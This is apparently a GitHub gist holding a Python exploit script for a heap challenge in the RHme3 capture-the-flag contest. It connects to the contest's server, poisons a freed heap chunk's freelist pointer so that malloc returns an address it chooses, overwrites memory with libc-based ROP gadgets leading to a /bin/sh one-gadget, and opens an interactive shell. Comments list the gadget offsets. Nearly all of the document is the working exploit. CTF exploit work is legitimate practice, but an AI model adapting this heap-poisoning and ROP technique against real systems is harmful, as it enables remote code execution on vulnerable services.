/rhme3_exploit.py
Created Aug 29, 2017
| #!/usr/bin/env python | |
| import socket | |
| import time | |
| import telnetlib | |
| import struct | |
| LIBC_BASE = 0x7eff13bcb000 | |
| HEAP_BASE = 0x248b000 | |
| SLEEP_TIME = 1 | |
| t = telnetlib.Telnet() | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.connect(("pwn.rhme.riscure.com",1337)) | |
| #s.connect(("127.0.0.1",1337)) | |
| def doRecv(): | |
| print "<< ", s.recv(1024) | |
| time.sleep(SLEEP_TIME) | |
| def doSend(data): | |
| print ">> ", data | |
| s.send(data + "\n") | |
| time.sleep(SLEEP_TIME) | |
| doRecv() | |
| blahfuck = raw_input('attach debugger and press enter..') | |
| doRecv() | |
| doSend("1") # add our fake chunk player | |
| doSend("fake") | |
| doSend("33") | |
| doSend("0") | |
| doSend("33") | |
| doSend("0") | |
| doSend("1") | |
| doSend("hax") # add a player | |
| doSend("1") | |
| doSend("1") | |
| doSend("1") | |
| doSend("1") | |
| doSend("3") # get a pointer to it | |
| doSend("1") | |
| doSend("2") # free underlying data | |
| doSend("1") | |
| doSend("4") | |
| doSend("1") | |
| # the below is a heap offset | this is 0x1620 offset from heap base. | |
| # heap base == 0x1a34000 | |
| # offset: 0x1620 | |
| # == 0x1a35620 | |
| doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk | |
| doSend("0") | |
| doSend("1") | |
| doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist | |
| doSend("3") # so our poisoned malloc is in response to the Name malloc | |
| doSend("3") | |
| doSend("3") | |
| doSend("3") | |
| doSend("1") | |
| doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will | |
| doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of | |
| doSend("4") # of our choosing | |
| doSend("4") | |
| doSend("4") | |
| doSend("3") | |
| doSend("0") | |
| doSend("4") | |
| doSend("1") | |
| doSend(struct.pack('<Q', LIBC_BASE + 0x101f80)) | |
| doSend("1") | |
| g1 = struct.pack('<Q', LIBC_BASE + 0x34a70) | |
| g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78) | |
| g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3) | |
| s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n") | |
| t.sock = s | |
| t.interact() | |
| # /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3 | |
| # /bin/sh 0x7f503050d6c0 | |
| # 0x7f5030436b7b 0x1fb7b xor eax eax, ret | |
| # 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret | |
| # 0x7f5030436b78 0x1fb78 pop r12, ret |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment